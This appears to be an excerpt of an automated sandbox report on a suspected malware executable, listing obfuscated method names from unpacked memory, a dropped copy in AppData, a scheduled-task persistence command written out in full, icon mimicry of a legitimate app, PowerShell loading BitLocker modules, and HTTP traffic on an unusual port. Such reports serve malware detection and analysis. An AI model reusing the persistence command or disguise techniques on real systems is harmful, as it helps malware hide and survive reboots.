                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, z6rkYJYCMfn8w7u2YI.csHigh entropy of concatenated method names: 'ToString', 'd9wIBJqIpw', 'vuLIRlrQvu', 'sbuI6EdcVk', 'nnZIiKgpix', 'UE9IWcfA4J', 'ctgI9K1xfu', 'BECIuootdJ', 'mHsIaAK8CU', 'tn3IrDplJc'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, TS1PHao4NO7etbiFNx.csHigh entropy of concatenated method names: 'znb45Cm8r5', 'Ydx4CC7tWE', 'sDt4QTiOm3', 'coK48ge4oC', 'JTq4bH58KL', 'Bc14xFfe6u', 'dL64JtuskQ', 'WnH4SV4oW6', 'NQk4sQelXS', 'LvH4dsiHLg'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, Y302EqHAjSSuN9KdNno.csHigh entropy of concatenated method names: 'xdLphvmEyv', 'ocbpgGXwSn', 'AX0pZN0Okq', 'pSgp3gSEjV', 'YxGpwgtUyv', 'MTMp0fCk9P', 'GMLpTXveOY', 's6PpnDVSGj', 'FBsptVOZW6', 'eIrpXXKM6n'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RGHWEqtxPQXSGfmOil.csHigh entropy of concatenated method names: 'RvVQ31gZcF', 'dFeQ0E0QBS', 'RIvQnVtefL', 'V1LQtpsy2i', 'ijdQcClP0k', 'EceQIu1WJe', 'dvMQ2RWkJk', 'o16Q42TdTl', 'B74QpEHnbx', 'kjeQLwgad6'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, YAGR2NrKWdiDP3MFOj.csHigh entropy of concatenated method names: 'zVBxh2UaxW', 'GtYxgo0olG', 'MO6xZoZuUj', 'Ps8x3qP19U', 'BdgxwCex2F', 'K60x0jPhtF', 'OKOxTagspc', 'gaTxnVFQTa', 'OFAxtKE4hN', 'IG0xXabvGp'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, dDTejRGib1udXmORKR.csHigh entropy of concatenated method names: 'CZI2sB7J4k', 'TRP2d303wC', 'ToString', 'XDj25CO4XO', 'cdY2CNEBu2', 'e712QIZiX0', 'iKw28U8ZE6', 'EH02bbk1HU', 'TPV2xqurUv', 'FN32JB4Zjs'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, nolkxinFKGZ2pvmyP3.csHigh entropy of concatenated method names: 'lU1CPbvIWx', 'hiXCq3ADgN', 'KbQCYq9OkV', 'pVTCG9Yy0W', 'jHcCM7lyPp', 'rCLCFZpcjD', 'wSfCjDdvm3', 'C6RCo1ovq3', 'nmpCNPxboo', 'lufCVulumg'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, L8tJXyuQ8neDCvot3i.csHigh entropy of concatenated method names: 'A3Gx5IZhYR', 'ypwxQQdtPG', 'bLLxbQJDwL', 'DnPbV06ob8', 'nEEbzXtARr', 'g18xAWYsqd', 'hchxH7epAD', 'ElkxU1nK1c', 'wIfxl39P01', 'gnPxEhnNYc'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, aQshNNCH4CodijdYsP.csHigh entropy of concatenated method names: 'Dispose', 'unxHNJ3s9n', 'IhcURt1UUI', 'vy7ooYvO6P', 'fYSHV1PHa4', 'YO7HzetbiF', 'ProcessDialogKey', 'XxqUAA0wkJ', 'UUAUHOO3kJ', 'eCfUUZyGDI'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, Bmp9dczvT1fPbpY6QO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MnupOTHTGx', 'HoOpcIyhUu', 'megpIyVxFD', 'MLdp21wRLw', 'UEgp417hqS', 'VvCppkAtmh', 'vA6pL4UkG6'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, qgCP74PGstlnZlSJME.csHigh entropy of concatenated method names: 'fDVc70y5BD', 'CEqc13P0Nx', 'NoucPDdMUs', 'xFjcqKY13H', 'LJKcR31icM', 'ndjc6WEDgL', 'GqvcicHvPT', 'lYvcWIpy0W', 'Poyc9hH9Og', 'B2ScusYnXK'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csHigh entropy of concatenated method names: 'xlQleJbqUl', 'gUQl5exSmW', 'JyrlCNKMOj', 'cGllQH4mNQ', 'sgKl84pjLp', 'v7Xlb6huNs', 'e2NlxuxAaE', 'wq0lJxdbHl', 'VVklSvAk3R', 'cH8lsKsv1s'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, CmxrfYvu3VwPRo8KEV.csHigh entropy of concatenated method names: 'hGBOnZY1T7', 'AfqOtHdLfp', 'HCOOfMWcJ6', 'lytORhOQyX', 'Eh9OiEcr46', 'yvsOWLGemc', 'omeOu9hc4R', 'v4sOa5FhGf', 'rYLO7MnyYN', 'YLnOBxupnc'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RA0wkJNMUAOO3kJeCf.csHigh entropy of concatenated method names: 'Qys4f05Ym4', 'MLt4RiNO01', 'YA846bVlxe', 'Fw14iYsUaO', 'LRC4PAiiw3', 'N2j4WSCwtv', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, Ie6tbOHlXISBMESa7Lt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sfxLPQq38I', 'KqBLqclyuS', 'j57LYMvT3y', 'lpbLGOsQ1s', 'A9aLMlTxgB', 'maZLF6GNbF', 'PB0LjYryGF'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, YSvyiefG2RqyJQ7gDS.csHigh entropy of concatenated method names: 'W6ebejiKoe', 'TqmbCPNxNV', 'cCnb841FVL', 'qE7bxW5SqR', 'SeLbJa6Lfl', 'WeM8M5HrOt', 'fiO8FMXvR7', 'PML8jqwMVF', 'i8W8o0p3Ht', 'CpV8NI4T4C'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, brPLbpEGR0JAFmLvSo.csHigh entropy of concatenated method names: 'HSOHxolkxi', 'UKGHJZ2pvm', 'RxPHsQXSGf', 'xOiHdlJrEJ', 'd0IHcWxVSv', 'uieHIG2Rqy', 'XbeOH55sLXRnbRfhHQ', 'L8vnxA1msklkhsenjZ', 'LGkHHrw2AT', 'TsWHl3DBUq'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, lxwbqfHHiZuE396D05m.csHigh entropy of concatenated method names: 'ToString', 'i9oLlmRioN', 'JtaLEBxVCv', 'aukLe1oCYs', 'OltL54cBFq', 'iocLCMqq9p', 'K0ILQfAr9j', 'zDKL8UMwTG', 'pKQ3ACH1od7heYsPNsb', 'WaxUrHHZIuVaVrMvC1S'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, EXFsAoUrlFXQpfKFId.csHigh entropy of concatenated method names: 'DhhZ9l64B', 'X2a3BZkU8', 'sFk0UrTOi', 'w2dTYeUIt', 'DauthA8LL', 'otFX2ML86', 'hMw2wMp5Viu718rLlH', 'DcrfW4Si4UNcm3CrWO', 'lF44r7nmv', 'ly7LfAYWQ'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, ROQeebFCJTD6D8QbK4.csHigh entropy of concatenated method names: 'E2x2oUbaje', 'RQa2VerZoy', 'ByH4AL0S7y', 'Omg4H5DYLw', 'JSw2B4ijmN', 'RT921jlAdu', 'W1b2vAkwio', 'KAr2PUiNFj', 'tGv2qG1sn5', 'a662YbcVSI'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, zyGDIJVICS713NUbeG.csHigh entropy of concatenated method names: 'EjEpH6PWam', 'e6xplDDt9G', 'r0JpEUK4W8', 'rThp5fECtl', 'FFUpCosS4p', 'VqHp8HRlCg', 'ch7pbJjRgw', 'Na84jqeJLr', 'VLI4oG7IDf', 'ypf4NHOiLq'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, z6rkYJYCMfn8w7u2YI.csHigh entropy of concatenated method names: 'ToString', 'd9wIBJqIpw', 'vuLIRlrQvu', 'sbuI6EdcVk', 'nnZIiKgpix', 'UE9IWcfA4J', 'ctgI9K1xfu', 'BECIuootdJ', 'mHsIaAK8CU', 'tn3IrDplJc'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, TS1PHao4NO7etbiFNx.csHigh entropy of concatenated method names: 'znb45Cm8r5', 'Ydx4CC7tWE', 'sDt4QTiOm3', 'coK48ge4oC', 'JTq4bH58KL', 'Bc14xFfe6u', 'dL64JtuskQ', 'WnH4SV4oW6', 'NQk4sQelXS', 'LvH4dsiHLg'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, Y302EqHAjSSuN9KdNno.csHigh entropy of concatenated method names: 'xdLphvmEyv', 'ocbpgGXwSn', 'AX0pZN0Okq', 'pSgp3gSEjV', 'YxGpwgtUyv', 'MTMp0fCk9P', 'GMLpTXveOY', 's6PpnDVSGj', 'FBsptVOZW6', 'eIrpXXKM6n'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RGHWEqtxPQXSGfmOil.csHigh entropy of concatenated method names: 'RvVQ31gZcF', 'dFeQ0E0QBS', 'RIvQnVtefL', 'V1LQtpsy2i', 'ijdQcClP0k', 'EceQIu1WJe', 'dvMQ2RWkJk', 'o16Q42TdTl', 'B74QpEHnbx', 'kjeQLwgad6'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, YAGR2NrKWdiDP3MFOj.csHigh entropy of concatenated method names: 'zVBxh2UaxW', 'GtYxgo0olG', 'MO6xZoZuUj', 'Ps8x3qP19U', 'BdgxwCex2F', 'K60x0jPhtF', 'OKOxTagspc', 'gaTxnVFQTa', 'OFAxtKE4hN', 'IG0xXabvGp'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, dDTejRGib1udXmORKR.csHigh entropy of concatenated method names: 'CZI2sB7J4k', 'TRP2d303wC', 'ToString', 'XDj25CO4XO', 'cdY2CNEBu2', 'e712QIZiX0', 'iKw28U8ZE6', 'EH02bbk1HU', 'TPV2xqurUv', 'FN32JB4Zjs'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, nolkxinFKGZ2pvmyP3.csHigh entropy of concatenated method names: 'lU1CPbvIWx', 'hiXCq3ADgN', 'KbQCYq9OkV', 'pVTCG9Yy0W', 'jHcCM7lyPp', 'rCLCFZpcjD', 'wSfCjDdvm3', 'C6RCo1ovq3', 'nmpCNPxboo', 'lufCVulumg'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, L8tJXyuQ8neDCvot3i.csHigh entropy of concatenated method names: 'A3Gx5IZhYR', 'ypwxQQdtPG', 'bLLxbQJDwL', 'DnPbV06ob8', 'nEEbzXtARr', 'g18xAWYsqd', 'hchxH7epAD', 'ElkxU1nK1c', 'wIfxl39P01', 'gnPxEhnNYc'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, aQshNNCH4CodijdYsP.csHigh entropy of concatenated method names: 'Dispose', 'unxHNJ3s9n', 'IhcURt1UUI', 'vy7ooYvO6P', 'fYSHV1PHa4', 'YO7HzetbiF', 'ProcessDialogKey', 'XxqUAA0wkJ', 'UUAUHOO3kJ', 'eCfUUZyGDI'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, Bmp9dczvT1fPbpY6QO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MnupOTHTGx', 'HoOpcIyhUu', 'megpIyVxFD', 'MLdp21wRLw', 'UEgp417hqS', 'VvCppkAtmh', 'vA6pL4UkG6'
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, qgCP74PGstlnZlSJME.csHigh entropy of concatenated method names: 'fDVc70y5BD', 'CEqc13P0Nx', 'NoucPDdMUs', 'xFjcqKY13H', 'LJKcR31icM', 'ndjc6WEDgL', 'GqvcicHvPT', 'lYvcWIpy0W', 'Poyc9hH9Og', 'B2ScusYnXK'
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeFile created: C:\Users\user\AppData\Roaming\VWGccZGgix.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49721
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
